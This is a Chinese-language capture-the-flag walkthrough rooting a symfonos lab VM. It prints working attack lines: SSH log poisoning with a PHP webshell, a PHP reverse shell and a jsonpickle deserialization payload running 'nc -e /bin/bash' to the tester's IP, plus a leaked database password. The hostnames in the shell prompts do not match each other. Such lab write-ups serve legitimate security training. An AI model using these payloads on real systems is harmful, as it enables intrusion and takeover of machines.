本文內(nèi)容純屬虛構(gòu)，攻略鴨求b站關(guān)注點(diǎn)贊支持！

要用VirtualBox，VMware不行

靶機(jī)IP地址：192.168.31.215

測(cè)試機(jī)IP地址：192.168.31.38

外部信息收集

訪問(wèn)http://192.168.31.215/只有一個(gè)img圖片

端口掃描

PORT ? STATE SERVICE REASON ? ? ? ? VERSION
22/tcp open ?ssh ? ? syn-ack ttl 64 OpenSSH 7.9p1 Debian 10 (protocol 2.0)
80/tcp open ?http ? ?syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))

網(wǎng)站目錄枚舉

ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.31.215/FUZZ -e .php,.txt -c
/gods
/atlantis.php
/sea.php

訪問(wèn)http://192.168.31.215/gods/發(fā)現(xiàn)三個(gè)log文件：hades.log、zeus.log、poseidon.log，分別是三個(gè)神話人物介紹

搜索引擎搜返回內(nèi)容，是執(zhí)行uptime命令的結(jié)果。

訪問(wèn)http://192.168.31.215/atlantis.php有登錄框

通過(guò)SQLi萬(wàn)能密碼登錄，響應(yīng)碼302跳轉(zhuǎn)至sea.php，點(diǎn)擊hades選項(xiàng)后URL變?yōu)椋篽ttp://192.168.31.215/sea.php?file=hades。內(nèi)容為hades.log文件的介紹。

測(cè)試文件包含漏洞

GET /sea.php?file=../../../../../../etc/passwd
GET /sea.php?file=../../../../../etc/passwd%00
都失敗

想到hades.log、zeus.log、poseidon.log都為.log后綴，嘗試讀取.log文件
GET /sea.php?file=../../../../../var/log/auth
成功返回了SSH日志

ssh '<?php phpinfo(); ?>'@192.168.31.215
GET /sea.php?file=../../../../../var/log/auth
成功返回了phpinfo頁(yè)面

ssh '<?php system($_GET['cmd']); ?>'@192.168.31.215
GET /sea.php?cmd=id&file=../../../../../var/log/auth
uid=33(www-data) gid=33(www-data) groups=33(www-data)

$ nc -nvlp 9000
GET /sea.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.31.38%22%2C9000%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&file=../../../../../var/log/auth
$ python -c 'import pty;pty.spawn("/bin/bash")'

本地信息收集

www-data@MiWiFi-R3600-srv:/var/www/html$ cat atlantis.php
<?php
? define('DB_USERNAME', 'root');
? define('DB_PASSWORD', 'yVzyRGw3cG2Uyt2r');
? $db = new PDO("mysql:host=localhost:3306;dbname=db", DB_USERNAME,DB_PASSWORD);
$statement = $db->prepare("Select * from users where username='".$username."' and pwd='".$pwd."'");
? $statement->execute();

www-data@MiWiFi-R3600-srv:/var/www/html$ cat sea.php
cat sea.php
<?php
include("gods/". $_GET['file']. '.log');
?>

www-data@MiWiFi-R3600-srv:/$ cat /etc/passwd
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
poseidon:x:1000:1000:,,,:/home/poseidon:/bin/bash

本地開(kāi)放端口
tcp ? ? LISTEN ? 0 ? ? ? ?128 ? ? ? ? ? ?127.0.0.1:8080 ? ? ? ? ?0.0.0.0:*

Useful software：
/usr/bin/base64
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/nc.traditional
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python
/usr/bin/python2
/usr/bin/python2.7
/usr/bin/python3
/usr/bin/python3.7
/usr/bin/socat
/usr/bin/wget

/opt文件夾通常是空的，發(fā)現(xiàn)存在/opt/code
www-data@symfonos4:/opt/code$ ls -alh
drwxr-xrwx 4 root root 4.0K Aug 19 ?2019 .
drwxr-xr-x 3 root root 4.0K Aug 18 ?2019 ..
-rw-r--r-- 1 root root ?942 Aug 19 ?2019 app.py
-rw-r--r-- 1 root root 1.5K Aug 19 ?2019 app.pyc
drwxr-xr-x 4 root root 4.0K Aug 19 ?2019 static
drwxr-xr-x 2 root root 4.0K Aug 19 ?2019 templates
-rw-r--r-- 1 root root ?215 Aug 19 ?2019 wsgi.pyc

cat app.py
發(fā)現(xiàn)jsonpickle

socat轉(zhuǎn)發(fā)8080端口

socat TCP-LISTEN:8081,fork TCP:127.0.0.1:8080

訪問(wèn)http://192.168.31.215:8081/whoami

Cookie: PHPSESSID=q7ctie2m9dp9fhv48m82t28204; username=eyJweS9vYmplY3QiOiAiYXBwLlVzZXIiLCAidXNlcm5hbWUiOiAiUG9zZWlkb24ifQ==

username用base64解碼為：{"py/object": "app.User", "username": "Poseidon"}

flask-json-pickle漏洞

搜索jsonpickle exploit，找到flask-json-pickle漏洞，exp：

{"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}

測(cè)試機(jī)開(kāi)啟監(jiān)聽(tīng)端口：nc -nvlp 3334

修改系統(tǒng)命令調(diào)用方法為os.system，改為：

{"py/object":"main.Shell","py/reduce":[{"py/type":"os.system"},{"py/tuple":["/usr/bin/nc -e /bin/bash 192.168.31.38 3334"]},null,null,null]}

Base64編碼后發(fā)送，得到shell

id

uid=0(root) gid=0(root) groups=0(root)

其他

flag

# cat /root/proof.txt
Congrats on rooting symfonos:3!

疑問(wèn)求助

1.flask-json-pickle漏洞的exp中換nc以外的方法都未成功；

2.是否還有其他提權(quán)方法？